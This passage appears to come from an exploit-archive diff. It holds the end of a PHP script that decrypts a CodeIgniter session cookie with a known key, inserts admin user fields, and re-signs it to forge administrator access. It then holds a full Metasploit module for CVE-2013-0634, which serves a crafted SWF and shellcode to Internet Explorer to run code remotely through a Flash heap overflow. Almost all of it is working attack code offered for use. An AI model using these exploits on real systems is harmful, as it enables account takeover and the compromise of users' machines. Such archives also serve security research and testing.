$str .= chr($temp);
}
return $str;
}
public function set_cipher($cipher)
{
$this->_mcrypt_cipher = $cipher;
return $this;
}
public function set_mode($mode)
{
$this->_mcrypt_mode = $mode;
return $this;
}
protected function _get_cipher()
{
if ($this->_mcrypt_cipher === NULL)
{
return $this->_mcrypt_cipher = MCRYPT_RIJNDAEL_256;
}
return $this->_mcrypt_cipher;
}
protected function _get_mode()
{
if ($this->_mcrypt_mode === NULL)
{
return $this->_mcrypt_mode = MCRYPT_MODE_CBC;
}
return $this->_mcrypt_mode;
}
public function set_hash($type = 'sha1')
{
$this->_hash_type = in_array($type, hash_algos()) ? $type : 'sha1';
}
public function hash($str)
{
return hash($this->_hash_type, $str);
}
}
$encryption = new CI_Encrypt();
$encryption->set_key(KEY);
// WRITE YOUR OWN COOKIE HERE!
$cookie = rawurldecode("DZyb3lI68zh+RBNg8C4M03TEJhMR4BBMzNWA1YUampWQ6UKaiUhG48rwkdfIs9DJYNQc8pZDniflInnUrQz1FbRxueQ3NLCahBBmrTuw8Ib7OL7ycm/IbuR81WEVrWpYOnQ4Z57/w21OCyVw42TjSkXkfWfN67veJr5630eTBA03vRbvLunZ9RLEuElqNrJu/H63yibCv8fyRWNnKs56i5OuU6Dso11O49k4fhxd008WTvsGliLxiErCkWwYfGfcjUA3V2Mh9mkrLk0YEKIbt3hbNXhAnGhIVIVJURhnmibqEFUacB1gP1GnbP2fQy3NpJt317n/3/sH+jH4lM+53IY1HOJh7n/J6RU9jqMr1hdeslDxFaV7SCuB4vPuO7SScec8063aae4808b195d818d86fda1d280ebb06bd");
$len = strlen($cookie) - 40;
if ($len < 0)
{
show_error('The session cookie was not signed.');
}
// Check cookie authentication
$hmac = substr($cookie, $len);
$session = substr($cookie, 0, $len);
if ($hmac !== hash_hmac('sha1', $session, KEY))
{
show_error('The session cookie data did not match what was expected.');
}
// Detect target encryption method and Decrypt session
$_mcrypt = $encryption->mcrypt_decode(base64_decode($session));
$_xor = $encryption->_xor_decode(base64_decode($session));
$method = '';
$plain = '';
if (strpos($_mcrypt, KEYWORD) !== false) {
_print("Encryption method is mcrypt!");
$method = 'm';
$plain = $_mcrypt;
} else if (strpos($_xor, KEYWORD) !== false) {
_print("Encryption method is xor!");
$method = 'x';
$plain = $_xor;
} else {
show_error("something went wrong.");
}
// Unserialize session string in order to create session array.
$session = unserialize($plain);
_print("Current Session Array :");
print_r($session).PHP_EOL;
// Add extra fields into it
$session['cms_user_name'] = 'admin';
$session['cms_user_id'] = 1;
// Print out payload string.
_print("Payload appended Session Array :");
print_r($session).PHP_EOL;
// Serialize it
$session = serialize($session);
// Encrypt it with same key.
if ($method === 'm')
$payload = base64_encode($encryption->mcrypt_encode($session));
if ($method === 'x')
$payload = base64_encode($encryption->_xor_encode($session));
// Calculation of hmac to add it end of the encrypted session string.
$payload .= hash_hmac('sha1', $payload, KEY);
_print("New Cookie");
_print($payload);
_print("Use Tamper Data and change cookie then push F5!");

121
platforms/windows/remote/32959.rb Executable file
View file

@ -0,0 +1,121 @@
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::BrowserExploitServer
def initialize(info={})
super(update_info(info,
'Name' => "Adobe Flash Player Regular Expression Heap Overflow",
'Description' => %q{
This module exploits a vulnerability found in the ActiveX component of Adobe
Flash Player before 11.5.502.149. By supplying a specially crafted swf file
with special regex value, it is possible to trigger an memory corruption, which
results in remote code execution under the context of the user, as exploited in
the wild in February 2013. This module has been tested successfully with Adobe
Flash Player 11.5 before 11.5.502.149 on Windows XP SP3 and Windows 7 SP1 before
MS13-063, since it takes advantage of a predictable SharedUserData in order to
leak ntdll and bypass ASLR.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Unknown', # malware sample
'Boris "dukeBarman" Ryutin', # msf exploit
'juan vazquez' # ActionScript deobfuscation and cleaning
],
'References' =>
[
[ 'CVE', '2013-0634' ],
[ 'OSVDB', '89936'],
[ 'BID', '57787'],
[ 'URL', 'http://malwaremustdie.blogspot.ru/2013/02/cve-2013-0634-this-ladyboyle-is-not.html' ],
[ 'URL', 'http://malware.dontneedcoffee.com/2013/03/cve-2013-0634-adobe-flash-player.html' ],
[ 'URL', 'http://www.fireeye.com/blog/technical/cyber-exploits/2013/02/lady-boyle-comes-to-town-with-a-new-exploit.html' ],
[ 'URL', 'http://labs.alienvault.com/labs/index.php/2013/adobe-patches-two-vulnerabilities-being-exploited-in-the-wild/' ],
[ 'URL', 'http://eromang.zataz.com/tag/cve-2013-0634/' ]
],
'Payload' =>
{
'Space' => 1024,
'DisableNops' => true
},
'DefaultOptions' =>
{
'InitialAutoRunScript' => 'migrate -f',
'Retries' => false
},
'Platform' => 'win',
'BrowserRequirements' =>
{
:source => /script|headers/i,
:clsid => "{D27CDB6E-AE6D-11cf-96B8-444553540000}",
:method => "LoadMovie",
:os_name => Msf::OperatingSystems::WINDOWS,
:ua_name => Msf::HttpClients::IE,
:flash => lambda { |ver| ver =~ /^11\.5/ && ver < '11.5.502.149' }
},
'Targets' =>
[
[ 'Automatic', {} ]
],
'Privileged' => false,
'DisclosureDate' => "Feb 8 2013",
'DefaultTarget' => 0))
end
def exploit
@swf = create_swf
super
end
def on_request_exploit(cli, request, target_info)
print_status("Request: #{request.uri}")
if request.uri =~ /\.swf$/
print_status("Sending SWF...")
send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Pragma' => 'no-cache'})
return
end
print_status("Sending HTML...")
tag = retrieve_tag(cli, request)
profile = get_profile(tag)
profile[:tried] = false unless profile.nil? # to allow request the swf
send_exploit_html(cli, exploit_template(cli, target_info), {'Pragma' => 'no-cache'})
end
def exploit_template(cli, target_info)
swf_random = "#{rand_text_alpha(4 + rand(3))}.swf"
shellcode = get_payload(cli, target_info).unpack("H*")[0]
html_template = %Q|<html>
<body>
<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab" width="1" height="1" />
<param name="movie" value="<%=swf_random%>" />
<param name="allowScriptAccess" value="always" />
<param name="FlashVars" value="his=<%=shellcode%>" />
<param name="Play" value="true" />
</object>
</body>
</html>
|
return html_template, binding()
end
def create_swf
path = ::File.join( Msf::Config.data_directory, "exploits", "CVE-2013-0634", "exploit.swf" )
swf = ::File.open(path, 'rb') { |f| swf = f.read }
swf
end
end